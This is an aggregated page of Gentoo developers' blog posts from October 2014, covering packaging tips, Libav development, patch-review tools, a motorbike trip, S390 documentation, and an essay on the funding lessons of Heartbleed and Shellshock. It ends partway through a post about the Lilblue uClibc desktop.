Gentoo Logo
Gentoo Logo Side
Gentoo Spaceship

Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Zack Medico

Last updated:
October 24, 2014, 21:05 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

October 19, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
dev-lang/perl
virtual/perl-*
perl-core/*
Of course, as always, bugs may be present; what you get as Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our bugzilla.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Lots of new challenges ahead (October 19, 2014, 14:01 UTC)

I’ve been pretty busy lately, albeit behind the corners, which leads to a lower activity within the free software communities that I’m active in. Still, I’m not planning any exit, on the contrary. Lots of ideas are just waiting for some free time to engage. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into a good shape and getting settled. Today I finished the last job that I wanted to finish in my appartment in a short amount of time, so that’s one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)

October 18, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Fix ALL the BUGS! (October 18, 2014, 12:12 UTC)

Vittorio started (with some help from me) to fix all the issues pointed by Coverity.

Static analysis

Coverity (and scan-build) are quite useful to spot mistakes even if their false-positive ratio tend to be quite high. Even the false-positives are usually interesting since the spot code unnecessarily convoluted. The code should be as simple as possible but not simpler.

The basic idea behind those tools is to try to follow the code-paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would deference it).

The problems with this approach are usually two: false positive due to the limited scope of the analyzer and false negatives due shadowing.

False Positives

Coverity might assume certain inputs are valid even if they are made impossible by some initial checks up in the codeflow.

In those case you should spend enough time to make sure Coverity is not right and those faulty inputs aren’t slipping somewhere. NEVER try to just add some checks to the code pointed as first move, you might either hide issues (e.g. if Coverity complains about uninitialized variable do not just initialize it to nothing, check why it happens and if the logic behind is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic but simply that the static analyzers usually keep some limit on how deep they go depending on the issues already present and how much time had been spent already.

That surprise had been fun since apparently some of the time limit is per compilation unit so splitting large files in smaller chunks gets us more results (while speeding up the building process thanks to better parallelism).

Usually fixing some high-impact issue gets us 3 or 5 new small impact issues.

I like solving puzzles so I do not mind having more fun, sadly I did not have much spare time to play this game lately.

Merge ALL the FIXES

Fixing properly all the issues is a lofty goal and as usual having a patch is just 1/2 of the work. Usually two set of eyes work better than one and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.

So far about 100+ patches got piled up over the past weeks and now they are sent in small batches to ease the work of review. (I have something brewing to make reviewing simpler, as you might know)

During the review what probably about 1/10 of the patches will be rejected and the relative coverity report updated with enough information to explain why it is a false positive or the dangerous or strange behaviour pointed is intentional.

The next point release for our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers that spend their free time keeping all the branches up to date!

Tracking patches (October 18, 2014, 11:53 UTC)

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I’m quite fond in improving the tools I use. And that’s why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I already discussed about lldb and asan/valgrind, now my current focus is about patch trackers. In part it is due to the current effort to improve the libav one,

Contributors

Before talking about patches and their tracking I’d digress a little on who produces them. The mythical Contributor: without contributions an opensource project would not exist.

You might have recurring contributions and unique/seldom contributions. Both are quite important.
In general you should make so seldom contributors become recurring contributors.

A recurring contributor can accept to spend some additional time to setup the environment to actually provide its contribution back to the community, a sporadic contributor could be easily put off if the effort required to send his patch is larger than writing the patch itself.

Th project maintainers should make so the life of contributors is as simple as possible.

Patches and Revision Control

Lately most opensource projects saw the light and started to use decentralized source revision control system and thanks to github and many other is the concept of issue pull requests is getting part of our culture and with it comes hopefully a wider acceptance to the fact that the code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario new code is usually developed in topic branches, routinely rebased against the master until the set is ready and then the set of changes (called series or patchset) is reviewed and after some round of fixes eventually merged. Thanks to bitbucket now we have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review bugs are usually spotted as well way to improve are suggested. Patches might be split or merged together and the series reworked and improved a lot.

The process is usually time consuming, even more for an organization made of volunteer: writing code is fun, address issues spotted is not so much, review someone else code is much less even.

Sadly it is a necessary annoyance since otherwise the errors (and horrors) that would slip through would be much bigger and probably much more. If you do not care about code quality and what you are writing is not used by other people you can probably ignore that, if you feel somehow concerned that what you wrote might turn some people life in a sea of pain. (On the other hand some gratitude for such daunting effort is usually welcome).

Pull request management

The old fashioned way to issue a pull request is either poke somebody telling that your branch is ready for merge or just make a set of patches and mail them to whoever is in charge of integrating code to the main branch.

git provides a nifty tool to do that called git send-email and is quite common to send sets of patches (called usually series) to a mailing list. You get feedback by email and you can update the set using the --in-reply-to option and the message id.

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

gerrit and reviewboard provide custom scripts to setup ephemeral branches in some staging area then the review process requires a browser again. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach the more setup intensive.

Pro and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am. And if the reply-to field is used properly updates appear sorted in a good way.

This method is the simplest for the people used to have the email client always open and a console (if they are using a well configured emacs or vim they literally do not move away from the editor).

On the other hand, people using a webmail or using a basic email client might find the approach more cumbersome than a web based one.

If your only method to track contribution is just a mailing list, gets quite easy to forget which is the status of a set. Patches could be neglected and even who wrote them might forget for a long time.

Patchwork approach

Patchwork tracks which patches hit a mailing list and tries to figure out if they are eventually merged automatically.

It is quite basic: it provides an web interface to check the status and provides a mean to just update the patch status. The review must happen in the mailing list and there is no concept of series.

As basic as it is works as a reminder about pending patches but tends to get cluttered easily and keeping it clean requires some effort.

Github approach

The web interface makes much easier spot what is pending and what’s its status, people used to have everything in the browser (chrome and mozilla could be made to work as a decent IDE lately) might like it much better.

Reviewing small series or single patches is usually nicer but the current UIs do not scale for larger (5+) patchsets.

People not living in a browser find quite annoying switch context and it requires additional effort to contribute since you have to register to a website and the process of issuing a patch requires many additional steps while in the email approach just require to type git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than the Github counterparts. That can be good or bad since they aren’t as immediate and tend to overwhelm new contributors.

You need to make an additional effort to setup your environment since you need some custom script.

The series are tracked with additional precision, but for all the practical usage is the same as github with the additional bourden for the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

It’s basic concept is to be non-intrusive as much as possible, retaining all the pros of the simple git+email workflow like patchwork does.

It provides already additional features such as the ability to manage series of patches and to track updates to it. It sports a view to get a break out of which series require a review and which are pending for a long time waiting for an update.

What’s pending is adding the ability to review it directly in the browser, send the review email for the web to the mailing list and a some more.

Probably I might complete it within the year or next spring, if you like Flask or python contributions are warmly welcome!

October 17, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
My ideal editor (October 17, 2014, 19:03 UTC)

Notepad Art
Photo credit: Stephen Dann

Some of you probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about that since at least last year when Typo decided to start eating my drafts. After that almost meltdown I decided to look for alternatives on writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to be able to get the new one – and then with Google Docs.

I have indeed kept using Google Docs until recently, when it started having some issues with dead keys. Because I have been using US International layout for years, and I'm too used to it when I write English too. If I am to use a non-deadkeys keyboard, I end up adding spaces where they shouldn't be. So even if it solves it by just switching the layout, I wouldn't want to write a long text with it that way.

Then I decided to give another try to Evernote, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12 months subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while until they decided to throw me into the new Beta editor, which follows all the newest trends in blog editors. Yes because there are trends in editors now! Away goes the full-width editing, instead you have a limited-width editing space in a mostly-white canvas with disappearing interface, like node.js's Ghost and Medium and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they try to make things that look neat and that supposedly are there to help you "focus on writing" they miss the point quite a bit with me. Indeed, rather than having a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I got to Evernote, and the note is gone. Indeed it asked me to log back in. And I logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting me that you should not edit things online. What? In 2014? You've got to be kidding me.

But just to make that clear, yes I have used offline editing for a while back, as Typo's editor has been overly sensible to changes too many times. But it does not scale. I'm not always on the same device, not only I have three computers in my own apartment, but I have two more at work, and then I have tablets. It is not uncommon for me to start writing on a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post while at a conference with my work laptop, and then finish it in my room on the personal one, and so on so forth.

Yes I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great, if you end up having one of the devices offline by mistake — better than the effets of it on password syncs but not so much better. Indeed I have bad experiences with that, because it makes it too easy to start working on something completely offline, and then forget to resync it before editing it from a different service.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First they suffer from the same problems stated above with working offline, and secondly they don't really support comments as first class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, including it in the page as an external iframe. I not only don't like the idea of farming out the comments to a different service in general, but I would be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered down with my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time to make the drafts bulletproof. Client-side offline storage should allow for preserving data even in case of being logged out or losing network connection. I know it's not easy (or I would be writing it myself) but it shouldn't be impossible, either. Right now it seems the bling is what everybody wants to work on, rather than functionality — it probably is easier to put in your portfolio, and that could be a good explanation as any.

October 15, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this documentary today…

https://archive.org/details/TheInternetsOwnBoyTheStoryOfAaronSwartz

October 14, 2014
Jan Kundrát a.k.a. jkt (homepage, bugs)

Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned an ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to end working with upstream and instead focus on a standalone long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem and we agreed that there's no point in keeping unmaintained and dead code in our repository anymore -- hence it's being removed.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
One month in Turkey (October 14, 2014, 20:35 UTC)

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.

Transportation

Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road, (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, constructions)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)

Turkish customs are very friendly and polite, it’s really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6000 kms to our brave and astonishing Harley-Davidson Nightster. We encountered no problem at all with the bike even though we clearly didn’t go easy on her. We rode on gravels, dirt and mud without her complaining, not to mention the weight of our luggages and the passengers ;)

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can’t describe well enough the pleasure and freedom feeling you get when travelling in motorbike so I hope those first photos will give you an idea.

I have to admit that it’s really impressive to leave your bike alone between the numerous trucks parking, loading/unloading their stuff a few centimeters from it.

IMG_20140905_130004

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

We arrived in Piraeus easily, time to buy tickets for the next boat to Kos.

IMG_20140906_164101  IMG_20140906_191845

 

 

 

 

 

 

Kos is quite a big island that you can discover best by … riding around !

IMG_20140907_121148

After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.

IMG_20140909_180844

 

 

 

 

 

 

 

This is a view from the Bozburun bay. Two photos for two bike layouts : beach version and fully loaded version ;)

IMG_20140909_191337 IMG_20140910_112858

 

 

 

 

 

 

 

On the way to Cappadocia, near Karapinar :

IMG_20140918_142943

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

The amazing landscapes of Cappadocia, after two weeks by the sea it felt cold up there.

IMG_20140920_140433 IMG_20140920_174936 IMG_20140921_130308

 

 

 

 

 

 

 

Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.

IMG_20140925_182326

 

 

 

 

 

 

 

 

 

 

 

 

October 13, 2014
Raúl Porcel a.k.a. armin76 (homepage, bugs)
S390 documentation in the Gentoo Wiki (October 13, 2014, 08:44 UTC)

Hi all,

One of the projects I had last year that I ended up suspending due to lack of time was S390 documentation and installation materials. For some reason there wasn’t any materials available to install Gentoo on a S390 system without having to rely in an already installed distribution.

Thanks to Marist College, IBM and Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Also thanks to the Debian project, since I based the materials in their procedure.

So most of the part of last year and the last few weeks I’ve been polishing and finishing the documentation I had around. So what I’ve documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both are based in the same pattern, since

Gentoo S390 on the Hercules emulator

This is probably the guide that will be more interesting because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system, it’s like QEMU. However QEMU, from what I can tell, is unable to emulate an S390 system in a non-S390 system, while Hercules does.

So if you want to have some fun and emulate a S390 machine in your computer, and install and use Gentoo in it, then follow the guide: https://wiki.gentoo.org/wiki/S390/Hercules

Gentoo S390 on z/VM

For those that have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo System working. Thanks to Dave Jones I was able to create the guide and test the release materials, he even did a presentation in the 2013 VM Workshop! Link to the PDF . Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is: https://wiki.gentoo.org/wiki/S390/Install

I have also written some tips and tricks for z/VM: https://wiki.gentoo.org/wiki/S390/z/VM_tips_and_tricks They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the autobuilds stage3 for s390, but we lacked the boot environment for installing Gentoo. This boot environment/release material is simply a kernel and a initramfs built with Gentoo’s genkernel based in busybox. It builds an environment using busybox like the livecd in amd64/x86 or other architectures. I’ve integrated the build of these boot environment with the autobuilds, so each week there should be an updated installation environment.

Have fun!


October 11, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
VDD14 Discussions: HWAccel2 (October 11, 2014, 14:47 UTC)

I took part to the Videolan Dev Days 14 weeks ago, sadly I had been too busy so the posts about it will appear in scattered order and sort of delayed.

Hardware acceleration

In multimedia, video is basically crunching numbers and get pixels or crunching pixels and getting numbers. Most of the operation are quite time consuming on a general purpose CPU and orders of magnitude faster if done using DSP or hardware designed for that purpose.

Availability

Most of the commonly used system have video decoding and encoding capabilities either embedded in the GPU or in separated hardware. Leveraging it spares lots of cpu cycles and lots of battery if we are thinking about mobile.

Capabilities

The usually specialized hardware has the issue of being inflexible and that does clash with the fact most codec evolve quite quickly with additional profiles to extend its capabilities, support different color spaces, use additional encoding strategies and such. Software decoders and encoders are still needed and need badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code we have lurking from our dark past) without much direction addressing short term problems and not really documenting how to use it.

As result all the people that dared to use it had to guess, usually used internal symbols that they wouldn’t have to use and all in all had to spend lots of time and
had enough grief when such internals changed.

Usage

Every backend required a quite large deal of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring to override get_format and get_buffer in some ways.

Overall to get the whole thing working the library user was supposed to do about 75% of the work. Not really nice considering people uses libraries to abstract complexity and avoid repetition

Backend support

As that support was written with just slice-based decoder in mind, it expects that all the backend would require the software decoder to parse the bitstream, prepare slices of the frame and feed the backend with them.

Sadly new backends appeared and they take directly either bitstream or full frames, the approach had been just to take the slice, add back the bitstream markers the backend library expects and be done with that.

Initial HWAccel 2 discussion

Last year since the number of backends I wanted to support were all bitstream-oriented and not fitting the mode at all I started thinking about it and the topic got discussed a bit during VDD 13. Some people that spent their dear time getting hwaccel1 working with their software were quite wary of radical changes so a path of incremental improvements got more or less put down.

HWAccel 1.2

  • default functions to allocate and free the backend context and make the struct to interface between Libav and the backend extensible without causing breakage.
  • avconv now can use some hwaccel, providing at least an example on how to use them and a mean to test without having to gut VLC or mpv to experiment.
  • document better the old-style hwaccels so at least some mistakes could be avoided (and some code that happen to work by sheer look won’t break once the faulty assuptions cease to exist)

The new VDA backend and the update VDPAU backend are examples of it.

HWAccel 1.3

  • extend the callback system to fit decently bitstream oriented backends.
  • provide an example of backend directly providing normal AVFrames.

The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get further closer to the end result of not having the casual users write boilerplate code to use hwaccel to get at least some performance boost and yet let the power users have the full access to the underpinnings so they can get most of it without having to write everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOption to set specific keys such as hwaccel and optionally hwaccel-device and the library will take care of everything. The frames returned by avcodec_decode_video2 will contain normal system memory and commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and such will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to separate completely the hwaccel path from the software path and specific functions to hand over the ownership of backend contexts and surfaces will be provided.

The software fallback won’t be anymore automagic in this case, but a specific AVERROR_INPUT_CHANGED will be returned so would be cleaner for the user reset the decoder without losing the display that maybe was sharing the same context. This leads the way to a simpler mean to support multiple hwaccel backends and fall back from one to the other to eventually the software decoding.

Migration path

We try our best to help people move to the new APIs.

Moving from HWAccel1 to HWAccel2 in general would result in less lines of code in the application, the people wanting to keep their callback need to just set them after avcodec_open2 and move the pixel specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make much simpler managing the backend specific resources.

Expected Time of Arrival

Right now the review is on the HWaccel1.3, I hope to complete this step and add few new backends to test how good/bad that API is before adding the other steps. Probably HWAccel2 will take at least other 6 months.

Help in form of code or just moral support is always welcome!

Mike Pagano a.k.a. mpagano (homepage, bugs)
Netflix on Gentoo (October 11, 2014, 13:11 UTC)

Contrary to some articles you may read on the internet, NetFlix is working great on Gentoo.

Here’s a snap shot of my system running 3.12.30-gentoo sources and google chrome version 39.0.2171.19_p1.

netflix

 

$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0

 

 

October 08, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v1.6 (October 08, 2014, 09:01 UTC)

Back from holidays, this new version of py3status was due for a long time now as it features a lot of great contributions !

This version is dedicated to the amazing @ShadowPrince who contributed 6 new modules :)

Changelog

  • core : rename the ‘examples’ folder to ‘modules’
  • core : Fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying current windows title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module clementine.py: Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman

Contributors

Huge thanks to this release’s contributors :

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What’s next ?

The next 1.7 release of py3status will bring a neat and cool feature which I’m sure you’ll love, stay tuned !

October 07, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Two types of respect mixed up by Linus Torvalds (October 07, 2014, 19:59 UTC)

I recently ran into the Q&A with Linus Torvalds @ Debconf 2014 video.

During the session, Torvalds is being criticized for lack of respect and replies that ~”respect is to be earned”. Technically, he confuses respect as in admiration with respect as in dignity. Simplified, he is saying that human dignity does not matter to him. Linus, I’m fairly disappointed.

October 06, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
How to stop Bleeding Hearts and Shocking Shells (October 06, 2014, 21:35 UTC)

Heartbleed logoThe free software community was recently shattered by two security bugs called Heartbleed and Shellshock. While technically these bugs where quite different I think they still share a lot.

Heartbleed hit the news in April this year. A bug in OpenSSL that allowed to extract privat keys of encrypted connections. When a bug in Bash called Shellshock hit the news I was first hesistant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big there were some things that alleviated the impact. It took some days till people found out how to practically extract private keys - and it still wasn't fast. And the most likely attack scenario - stealing a private key and pulling off a Man-in-the-Middle-attack - seemed something that'd still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: The OpenSSL project wasn't in good shape. The software that pretty much everyone in the Internet uses to do encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know that, I tried it). The truth about Bash looks even grimmer: It's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that run the Internet. Yet they are very small projects backed by few people. Besides they are both quite old, you'll find tons of legacy code in them written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much securer than it ever was and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed/Shellshock-alike bug will happen, ask this: What projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and received a good security audit lately?

Software installed on almost any Linux system

Let me propose a little experiment: Take your favorite Linux distribution, make a minimal installation without anything and look what's installed. These are the software projects you should worry about. To make things easier I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things. Some of these provide more attack surface than others, we should probably worry more about the ones that are directly involved in providing network services.

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted and the result is the Core Infrastructure Initiative by the Linux Foundation, which already helped improving OpenSSL development. This is a great start and an example for an initiative of which we should have more. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: A thorough security audit of a project like Bash would probably require a five figure number of dollars. For a small, volunteer driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed people started having a closer look at OpenSSL and found a number of small and one other quite severe issue. After Bash people instantly found more issues in the function parser and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug people start to look for more. I wonder what it'd take to have people looking at the projects that aren't in the spotlight.

I was brainstorming if we could have something like a "free software audit action day". A regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now, if you like it please leave a comment.

That's it. I refrain from having discussions whether bugs like Heartbleed or Shellshock disprove the "many eyes"-principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:

bzip2
gzip
tar
unzip
xz-utils
nano
ca-certificates
mime-types
pax-utils
bash
build-docbook-catalog
docbook-xml-dtd
docbook-xsl-stylesheets
openjade
opensp
po4a
sgml-common
perl
python
elfutils
expat
glib
gmp
libffi
libgcrypt
libgpg-error
libpcre
libpipeline
libxml2
libxslt
mpc
mpfr
openssl
popt
Locale-gettext
SGMLSpm
TermReadKey
Text-CharWidth
Text-WrapI18N
XML-Parser
gperf
gtk-doc-am
intltool
pkgconfig
iputils
netifrc
openssh
rsync
wget
acl
attr
baselayout
busybox
coreutils
debianutils
diffutils
file
findutils
gawk
grep
groff
help2man
hwids
kbd
kmod
less
man-db
man-pages
man-pages-posix
net-tools
sed
shadow
sysvinit
tcp-wrappers
texinfo
util-linux
which
pambase
autoconf
automake
binutils
bison
flex
gcc
gettext
gnuconfig
libtool
m4
make
patch
e2fsprogs
udev
linux-headers
cracklib
db
e2fsprogs-libs
gdbm
glibc
libcap
ncurses
pam
readline
timezone-data
zlib
procps
psmisc
shared-mime-info

October 04, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)

It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1].  The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro.  It is Gentoo, but Gentoo with a twist.  It’s a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  I use it on some of my workstations at the College and at home, like any other desktop, and I know other people that use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break.  Back in 2011, I got bored of working with the usual set of embedded packages.  So, while my students where writing their exams in Modern OS, I entertained myself just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop.  After playing with it on and off, I finally polished it where I thought others might enjoy it too and started pushing out releases.  Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground. uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention!  But that’s another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit, in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#ifndef HAVE_FALLOCATE64
#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers dont define __NR_fallocate
#endif

/*
